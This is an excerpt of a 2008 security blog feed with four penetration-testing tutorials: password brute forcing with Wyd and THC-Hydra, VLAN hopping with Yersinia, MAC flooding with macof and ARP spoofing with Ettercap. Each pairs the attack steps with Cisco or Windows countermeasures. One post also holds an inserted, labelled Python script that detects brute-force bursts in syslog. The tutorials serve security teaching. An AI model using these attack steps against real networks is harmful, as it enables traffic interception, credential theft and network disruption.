width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-4733760304688150578</id><published>2008-07-23T15:00:00.014-04:00</published><updated>2009-01-01T13:35:58.840-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wyd'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Hydra'/><title type='text'>The Yin and Yang of the Brute Force Attack</title><content type='html'>In today's post we are going to talk about brute force attacks against devices. A brute force attack is one where we repeatedly guess user names and passwords against a device until we hit the correct user name and password combination.&lt;br /&gt;&lt;br /&gt;The trick with this type of attack is tailoring it to the specific target you are attacking. In other words, use a dictionary built from words associated with your target to make the attack much more effective. We have a tool that can automatically create such dictionaries for us. This tool is called Wyd. Wyd is a Perl script created by the people at remote-exploit.org. To download it go &lt;a href="http://www.remote-exploit.org/codes_wyd.html"&gt;here&lt;/a&gt;. Wyd is designed to pull candidate passwords from .DOC, .XLS, .MP3 and other file types and create dictionaries that are specific to the target.&lt;br /&gt;&lt;br /&gt;In this example we are going to pick a website and generate a dictionary file. We will use this blog as the example.&lt;br /&gt;&lt;br /&gt;The first step is to get the website.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;wget zen-security.blogspot.com&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;This gives us an index.html file. Then we use Wyd to create the dictionary file with the following command.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;./wyd.pl -o output.txt index.html&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now we have a dictionary file based on the words found on this page. We can then feed this into our next tool to use as part of the attack. The next tool we are going to discuss is THC-Hydra. 
It is probably the best brute forcing tool available: it has a huge number of options and supports many different protocols. It also has a GTK GUI version, which is what we will be showing here.&lt;br /&gt;&lt;br /&gt;To open the GUI we launch &lt;strong&gt;xhydra&lt;/strong&gt;, which looks like the following.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_IYfuPD9qO24/SIeyhRZnH3I/AAAAAAAAAB4/j-ls-jKlmcY/s1600-h/xhydra.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_IYfuPD9qO24/SIeyhRZnH3I/AAAAAAAAAB4/j-ls-jKlmcY/s320/xhydra.jpg" alt="" id="BLOGGER_PHOTO_ID_5226342177263001458" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Next we select our target, port and protocol type. We then click the next tab, which is Passwords.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_IYfuPD9qO24/SIez8Vg6QNI/AAAAAAAAACA/DETfn2IYBgY/s1600-h/xhydra2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_IYfuPD9qO24/SIez8Vg6QNI/AAAAAAAAACA/DETfn2IYBgY/s320/xhydra2.jpg" alt="" id="BLOGGER_PHOTO_ID_5226343741735452882" border="0" /&gt;&lt;/a&gt;On this tab we select the output.txt file we created with Wyd earlier. We need to put in a username in order to run the cisco attack. We also need to change the tuning on the Tuning tab to 4. 
After this we move to the Start tab and start the attack.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_IYfuPD9qO24/SIe1yECZeCI/AAAAAAAAACI/TkYmCXZI3o0/s1600-h/xhydra3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SIe1yECZeCI/AAAAAAAAACI/TkYmCXZI3o0/s320/xhydra3.jpg" alt="" id="BLOGGER_PHOTO_ID_5226345764268636194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;After giving the attack some time you might just have a login to the device you are attacking.&lt;br /&gt;&lt;br /&gt;I recommend knowing THC-Hydra quite well, as this type of tool is extremely valuable to the ethical hacker. Most people don't configure devices securely, and this tool will usually hack them wide open. I haven't shown the command line version of the tool, but it is extremely powerful as well.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Countermeasures for Windows&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The best defense against this kind of attack is an account lockout, which can be configured fairly easily on most platforms. To set up account lockout in Windows, use Group Policy and set the following parameters.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_IYfuPD9qO24/SIe5Kijl_jI/AAAAAAAAACQ/xmy3yEX1Pe4/s1600-h/gplockout.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_IYfuPD9qO24/SIe5Kijl_jI/AAAAAAAAACQ/xmy3yEX1Pe4/s320/gplockout.jpg" alt="" id="BLOGGER_PHOTO_ID_5226349483312676402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Microsoft is somewhat deceptive here in stating that this procedure will lock out the accounts. 
It will lock them out, with the exception of the built-in Administrator account. That one detail will let an attacker own most Windows servers on which the Administrator account is present. To close the gap we use a tool called passprop.exe, which makes the Administrator account subject to lockout like every other account (run it with the /adminlockout switch). You can download this tool &lt;a href="http://theether.net/download/Microsoft/Utilities/passprop.exe"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Countermeasures for Cisco&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The countermeasure on the Cisco platform is to use AAA to limit the number of sign-in attempts you get.&lt;br /&gt;&lt;br /&gt;We start by doing the following (on IOS versions that support it, use the secret keyword instead of password so the credential is stored as a hash rather than a reversible type 7 string):&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:85%;" class="content"&gt;Router(config)# username mynet privilege 15 password &lt;span style="font-style: italic;"&gt;$3cr3tp@$$&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" class="content"&gt;Router(config)# aaa new-model&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" class="content"&gt;Router(config)# aaa local authentication attempts max-fail 3&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:85%;" class="content"&gt;Router(config)# aaa authentication login default local&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This creates a user named mynet whose account locks out after 3 failed attempts. 
To unlock an account, log in as a different user and issue the following from privileged EXEC mode (it is not a config command).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Router#clear aaa local user lockout username mynet&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;You can list the accounts that are currently locked out with &lt;span style="font-weight: bold;"&gt;Router#show aaa local user lockout&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;We have now attacked with and defended against a brute force attack. Our systems are now more secure because of our penetration test. This goes to show that sometimes chaos can bring balance. This is a life lesson in itself.
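As an added example (not from the original post), the Python script below watches Cisco IOS syslog for the failed-login bursts this kind of attack produces and confirms that the AAA lockout configured above actually fired. The log lines are constructed, and the %SEC_LOGIN-4-LOGIN_FAILED and %AAA-5-USER_LOCKED layouts are assumed to match a real device and should be checked against its output.

```python
"""
Added example, not code from the original post: spot a brute-force login
burst in Cisco IOS syslog and confirm that the AAA lockout fired.

Assumptions: the %SEC_LOGIN-4-LOGIN_FAILED and %AAA-5-USER_LOCKED layouts
below follow IOS, but check them against your own device's output.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: three failures against "mynet" from one source,
# the lockout produced by "aaa local authentication attempts max-fail 3",
# a fourth failure after the lockout, and one harmless typo by an admin.
SAMPLE_LOG = """\
Jul 23 14:59:01 router1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: mynet] [Source: 192.0.2.77] [localport: 23] [Reason: Login Authentication Failed] at 14:59:01 EDT Wed Jul 23 2008
Jul 23 14:59:02 router1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: mynet] [Source: 192.0.2.77] [localport: 23] [Reason: Login Authentication Failed] at 14:59:02 EDT Wed Jul 23 2008
Jul 23 14:59:03 router1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: mynet] [Source: 192.0.2.77] [localport: 23] [Reason: Login Authentication Failed] at 14:59:03 EDT Wed Jul 23 2008
Jul 23 14:59:03 router1 %AAA-5-USER_LOCKED: User mynet locked out on authentication failure
Jul 23 14:59:04 router1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: mynet] [Source: 192.0.2.77] [localport: 23] [Reason: Login Authentication Failed] at 14:59:04 EDT Wed Jul 23 2008
Jul 23 15:10:00 router1 %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 198.51.100.9] [localport: 22] [Reason: Login Authentication Failed] at 15:10:00 EDT Wed Jul 23 2008
Jul 23 15:10:30 router1 %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 198.51.100.9] [localport: 22] at 15:10:30 EDT Wed Jul 23 2008
"""

# Positional groups on purpose: (1) syslog timestamp, (2) user, (3) source.
FAILED_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ %SEC_LOGIN-4-LOGIN_FAILED: "
    r"Login failed \[user: ([^\]]*)\] \[Source: ([^\]]+)\]"
)
LOCKED_RE = re.compile(r"%AAA-5-USER_LOCKED: User (\S+) locked out")

THRESHOLD = 3                   # same figure as max-fail in the post
WINDOW = timedelta(seconds=60)  # failures must fall inside this span


def parse_ts(text):
    # Syslog timestamps carry no year, so strptime defaults to 1900; only
    # differences between timestamps are used, so that does not matter.
    return datetime.strptime(text, "%b %d %H:%M:%S")


def analyze(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return (bursts, locked).

    bursts maps a source address to the largest number of failed logins it
    produced inside any single window, for sources that reached threshold;
    locked is the set of usernames the router reported as locked out.
    """
    failures = defaultdict(list)
    locked = set()
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m.group(3)].append(parse_ts(m.group(1)))
            continue
        m = LOCKED_RE.search(line)
        if m:
            locked.add(m.group(1))

    bursts = {}
    for src, stamps in failures.items():
        stamps.sort()
        best, start = 0, 0
        for end, t in enumerate(stamps):
            # Slide the window start forward until the span fits in `window`.
            while t - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[src] = best
    return bursts, locked


def report(log_text):
    """Human-readable summary; returns the lines so callers can check them."""
    bursts, locked = analyze(log_text)
    lines = []
    for src, count in sorted(bursts.items()):
        lines.append("brute force suspected from %s: %d failures within %ds"
                     % (src, count, WINDOW.total_seconds()))
    for user in sorted(locked):
        lines.append("lockout confirmed for user %s" % user)
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_LOG):
        print(line)
```

A source that keeps failing after the lockout message shows the countermeasure working; a burst with no matching lockout line is the case worth paging on.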
</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/4733760304688150578/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=4733760304688150578' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4733760304688150578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4733760304688150578'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/then-yin-and-yang-of-brute-force-attack.html' title='The Yin and Yang of the Brute Force Attack'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_IYfuPD9qO24/SIeyhRZnH3I/AAAAAAAAAB4/j-ls-jKlmcY/s72-c/xhydra.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-1935390531460186105</id><published>2008-07-15T14:15:00.014-04:00</published><updated>2009-01-01T13:35:06.246-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yersinia'/><category scheme='http://www.blogger.com/atom/ns#' 
term='VLAN hopping'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><title type='text'>Destroying the LAN Part 3; The mysterious VLAN hopping attack</title><content type='html'>In today's post we are going to talk about another layer 2 switching attack, the mysterious VLAN hopping attack. I call the attack mysterious because for a long time this type of attack was considered theoretical. We have a nice little tool that lets us carry out this attack and show that it is a real threat.&lt;br /&gt;&lt;br /&gt;If you are a penetration tester/ethical hacker you should really become familiar with the tool we are going to talk about. It gives us a new ability to simulate dangerous internal attacks that would be extremely disruptive to a LAN. I usually recommend that this type of pen test is done with the LAN administrator knowing full well that the attack will probably cause some major issues on the LAN; in other words, after business hours.&lt;br /&gt;&lt;br /&gt;The tool we are going to explore today is called Yersinia. It is named after the bacterium that caused the black plague. If you understand the full potential of this tool you can see why it would be likened to the plague. This tool really gets down and dirty with layer 2: you can mess with spanning tree, CDP, DTP, HSRP, 802.1Q and more. If you would like to read more about this tool you can do so at &lt;a href="http://www.yersinia.net/"&gt;http://www.yersinia.net/&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;To execute this attack we are going to open Yersinia with the ncurses GUI. The command to run it in this mode is &lt;strong&gt;./yersinia -I&lt;/strong&gt;. For help on the different modes of Yersinia run &lt;strong&gt;./yersinia -h&lt;/strong&gt;. You should get a window that looks like the following.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;img id="BLOGGER_PHOTO_ID_5223974730824316802" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SH9JVwJmd4I/AAAAAAAAABo/ZON_mrq2ER0/s320/yersinia.jpg" border="0" /&gt;&lt;br /&gt;After executing Yersinia with the -I option you are presented with a screen that looks like the following:&lt;/p&gt;&lt;p&gt;&lt;a href="http://2.bp.blogspot.com/_IYfuPD9qO24/SH9MVZb7RhI/AAAAAAAAABw/waIooL1DDoQ/s1600-h/yersinia2.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5223978023262045714" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="http://2.bp.blogspot.com/_IYfuPD9qO24/SH9MVZb7RhI/AAAAAAAAABw/waIooL1DDoQ/s320/yersinia2.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Make sure that it shows the Ethernet interface you want to sniff traffic from. If it doesn't, press the i key and it should allow you to select an interface. At this point you will need to wait a few minutes (about 5) and, if the switch is vulnerable, you will start seeing DTP frames. If not, that's it: the attack is over. To see the VTP frame count you can hit F5.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;After seeing a few DTP packets we want to set up a trunk with the switch. To do this we hit g, choose DTP mode, x for attacks and 1 for trunking. You should see it display Dynamic Desirable on the screen. After it forms a trunk we should be able to see some traffic, mostly broadcast. Then we press g again, choose 802.1q, hit x again and choose 2 for 802.1q ARP poisoning. We then need to know a host that isn't alive in the VLAN, the VLAN number and the gateway of the VLAN we are hopping into. We enter this info and then we start seeing packets from the other VLAN. 
&lt;/p&gt;&lt;p&gt;&lt;br /&gt;This proves something Important, &lt;span style="font-weight: bold;"&gt;VLANS don't create security!!!!!!!!!&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Countermeasures&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;The countermeasures for this attack are actually quite simple. The most important is to make sure that all ports on a switch that aren't connecting to other switches are hard coded as access ports. I use the following configuration to shore up host ports from most attacks.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;3560(config-if)#switchport host&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This configuration accomplishes a few things. First it turns on portfast and then it hard codes the port for access. This is good for stations connected to an end host because it enables rapid spanning tree and makes the network start faster if the station is rebooted. It also disables the trunk negotiation which we used in the beginning of our attack.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;So now we have hopped vlans and then put in place security to stop this variation of the vlan hopping attack. 
So once again our network is in balance.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-1935390531460186105?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/1935390531460186105/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=1935390531460186105' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/1935390531460186105'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/522754168935527456/posts/default/1935390531460186105'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/destroying-lan-part-3-mysterious-vlan.html' title='Destroying the LAN Part 3; The mysterious VLAN hopping attack'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_IYfuPD9qO24/SH9JVwJmd4I/AAAAAAAAABo/ZON_mrq2ER0/s72-c/yersinia.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-2391458486564706517</id><published>2008-07-14T15:40:00.008-04:00</published><updated>2009-01-01T13:34:35.085-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Port Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Dsniff'/><category scheme='http://www.blogger.com/atom/ns#' term='Macof'/><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><title type='text'>Destroying the LAN Part 2; The Yin and Yang of Mac Flooding</title><content type='html'>The attack vector we are going to examine today is MAC address flooding. This is another attack that can actually break your network. Most networks recover pretty quickly from this type of attack, but it can knock a switch completely offline for a short period of time.&lt;br /&gt;&lt;br /&gt;The theory behind this type of attack is that most switches have a limited amount of memory for their CAM table. This means that under heavy load they start broadcasting all traffic to all ports. The MAC flooding attack fills up the CAM table to the point that the switch can't add any more MAC addresses to the table. This makes the switch start broadcasting all traffic to all ports, thus allowing an attacker to sniff traffic that they would not normally be able to access.&lt;br /&gt;&lt;br /&gt;The attack tool we are examining today is Macof. Macof is a tool that can flood random MAC addresses into a switch's CAM table. This tool is part of the Dsniff set of tools and can be downloaded &lt;a href="http://www.monkey.org/%7Edugsong/dsniff/"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To execute this kind of attack you need to start a packet sniffer such as Wireshark and then start Macof by doing &lt;span style="font-weight: bold;"&gt;macof -i eth0&lt;/span&gt;. This ensures that once the switch starts sending traffic your way you will be able to catch all of it in your sniffer program. This is essentially an attack-and-wait strategy, much like ARP spoofing. If you don't crash the switch, it will start flooding all the traffic that doesn't have an entry in the CAM table, thus sending the traffic for the entire LAN/VLAN out all of the ports. This traffic is then captured by Wireshark, which you already have open. At this point any unencrypted traffic is owned and you can use the filters in Wireshark to narrow down the type of traffic you are looking for.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Countermeasures&lt;/span&gt;&lt;br /&gt;The countermeasure for this attack, at least in the Cisco world, is a configuration option called port security. Port security allows a certain number of MAC addresses to attach to a port; once that number is exceeded an action will occur. This action is one of three possible actions: restrict, protect, and shutdown.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Restrict&lt;/span&gt; increments a violation counter which alerts a network administrator.&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Protect&lt;/span&gt; blocks any traffic from the new MAC addresses.&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Shutdown&lt;/span&gt; deactivates the port immediately and sends an SNMP trap notification.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Basically, once this is configured the attack can be blocked automatically by the switch. An example configuration for blocking this attack would be the following:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;3550-B(config-if)#switchport port-security&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;3550-B(config-if)#switchport port-security maximum 5&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;3550-B(config-if)#switchport port-security violation shutdown&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;3550-B(config-if)#switchport port-security mac-address aabb.ccdd.eeff&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;This configuration permits a total of 5 MAC addresses on the port and then shuts the port down. These commands accept many different options; for more information &lt;a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst3560/software/release/12.2_25_see/command/reference/cli3.html#wp1948361"&gt;check here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;So once again we have protected layer two traffic from sniffing and brought our network back into balance. The best protection for traffic is always encryption, but most network environments have legacy applications that must have traffic in the clear. The prime example of this is email and most printing functions.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-2391458486564706517?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/2391458486564706517/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=2391458486564706517' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2391458486564706517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/2391458486564706517'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/destroying-lan-part-2-yin-and-yang-of.html' title='Destroying the LAN Part 2; The Yin and Yang of Mac Flooding'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-6077016594301617986</id><published>2008-07-11T10:07:00.016-04:00</published><updated>2009-01-01T13:33:49.073-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Man in the Middle'/><category scheme='http://www.blogger.com/atom/ns#' term='Arp Spoofing'/><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><category scheme='http://www.blogger.com/atom/ns#' term='Dynamic Arp Inspection'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><title type='text'>Destroying the LAN; The Yin and Yang of ARP spoofing</title><content type='html'>The attack vector I am examining in today's post is ARP spoofing. Please be aware that this is a very destructive attack and can bring down an entire LAN.&lt;br /&gt;&lt;br /&gt;The theory behind ARP spoofing is that since ARP replies are not verified, an attacker can send a spoofed ARP reply to a victim machine, thereby poisoning its ARP cache. This type of attack can redirect traffic to any destination chosen by the attacker.&lt;br /&gt;&lt;br /&gt;This type of attack is mainly used to sniff traffic in a switched network. It has also been used in other ways to redirect traffic, such as the recent &lt;a href="http://seclists.org/fulldisclosure/2008/Jun/0011.html"&gt;hacking of metasploit.com&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The attack tool we are going to examine is Ettercap NG. Ettercap gives us the ability to choose a target for ARP spoofing and then redirect the traffic to our MAC address. Then we capture that traffic to look for information in clear text such as HTTP, FTP, Telnet, and POP3 usernames and passwords.&lt;br /&gt;&lt;br /&gt;&lt;img id="BLOGGER_PHOTO_ID_5221817074705460834" style="margin: 0px auto 10px; display: block; text-align: center;" alt="" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SHee9ovjbmI/AAAAAAAAABQ/Fy1FNu22okI/s200/etcap.jpg" border="0" /&gt;&lt;br /&gt;Ettercap works on Windows and Linux and has two different GUI options on Linux as well as a command line option. The full functionality of Ettercap is beyond the scope of this post, as it can be used for man-in-the-middle attacks of many different kinds.&lt;br /&gt;&lt;p&gt;The usage of Ettercap for ARP spoofing is amazingly self-explanatory for most users. Pick a sniffing method and scan the network for hosts. Add them as targets, then choose Mitm and ARP Poisoning. This attack is really great for getting cleartext usernames and passwords on a switched network. If you want more information on how to use Ettercap &lt;a href="http://www.milw0rm.com/video/watch.php?id=79"&gt;click here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Countermeasures&lt;/strong&gt;&lt;br /&gt;To counter the ARP spoofing attack we are going to use a function that is embedded into Cisco 3560 Catalyst switches. This function is called Dynamic ARP Inspection. It basically stops the ability of attackers to push bogus ARPs to the other machines.&lt;br /&gt;&lt;br /&gt;To quote Cisco: "Dynamic ARP inspection determines the validity of an ARP packet based on valid IP-to-MAC address bindings stored in a trusted database, the DHCP snooping binding database."&lt;/p&gt;&lt;p&gt;To configure Dynamic ARP Inspection you need to configure your switches with the following commands.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Cisco3560(config)#ip arp inspection vlan 100&lt;/strong&gt; (or whatever VLAN number you use)&lt;/p&gt;&lt;p&gt;On any port connected to another switch you must use the following command:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Cisco3560(config-if)#ip arp inspection trust&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;To use this feature DHCP snooping must be enabled, or you have to set up an ARP ACL that allows ARP for certain devices. This can be configured like the following.&lt;/p&gt;&lt;p&gt;This example shows how to configure an ARP ACL called host2 on Switch A, to permit ARP packets from Host 2 (IP address 1.1.1.1 and MAC address 0001.0001.0001), to apply the ACL to VLAN 1, and to configure port 1 on Switch A as untrusted:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Switch(config)# arp access-list host2&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Switch(config-arp-acl)# permit ip host 1.1.1.1 mac host 0001.0001.0001&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Switch(config-arp-acl)# exit&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Switch(config)# ip arp inspection filter host2 vlan 1&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Switch(config)# interface gigabitethernet0/1&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Switch(config-if)# no ip arp inspection trust&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;For more info on &lt;a href="http://www.cisco.com/en/US/docs/switches/lan/catalyst3560/software/release/12.2_20_se/configuration/guide/swdynarp.html#wp1038527"&gt;Dynamic ARP Inspection configuration click here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Once this configuration is in place the ARP spoofing attack doesn't function. So once again we have brought balance to the security of our information. This simple configuration stops one of the most dangerous internal attacks. These simple steps help secure the layer two infrastructure against attacks that could be devastating to an organization.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-6077016594301617986?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/6077016594301617986/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=6077016594301617986' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/6077016594301617986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/6077016594301617986'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/07/destroying-lan-yin-and-yang-of-arp.html' title='Destroying the LAN; The Yin and Yang of ARP spoofing'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
